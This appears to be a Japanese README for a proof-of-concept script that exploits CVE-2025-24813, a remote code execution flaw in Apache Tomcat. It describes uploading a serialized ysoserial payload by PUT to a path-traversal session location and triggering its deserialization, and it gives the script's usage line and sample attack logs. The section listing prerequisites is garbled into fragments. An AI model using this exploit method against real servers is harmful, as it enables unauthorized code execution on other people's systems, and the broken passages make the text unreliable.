
このリポジトリには、Apache Tomcatのリモートコード実行(RCE)脆弱性である**CVE-2025-24813**を悪用するための自動化された概念実証(PoC)スクリプトが含まれています。この脆弱性により、攻撃者は悪意のあるシリアル化されたペイロードをサーバーにアップロードし、特定の条件が満たされると、デシリアライゼーションを介して任意のコード実行を引き起こすことができます。
CVE-2025-24813 は、アップロードされたセッションファイルの不適切な処理とデシリアライズメカニズムを悪用する Apache Tomcat の理論上の RCE 脆弱性です。攻撃者は細工されたペイロードを書き込み可能なディレクトリ (例: /uploads/../sessions/) にアップロードすることで、デシリアライズをトリガーし、ターゲットサーバー上で任意のコマンドを実行できます。
この PoC が脆弱性を正常に悪用するには、以下の条件を満たす必要があります。
/index.jsp への GET リクエスト)、ペイロードのデシリアライズをトリガーする必要があります。ysoserial を使用してペイロードを生成するか、Java ベースのペイロードをコンパイルするため)。ysoserial ペイロードタイプを使用する場合、ysoserial.jar ファイルがローカルに存在する必要があります。python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser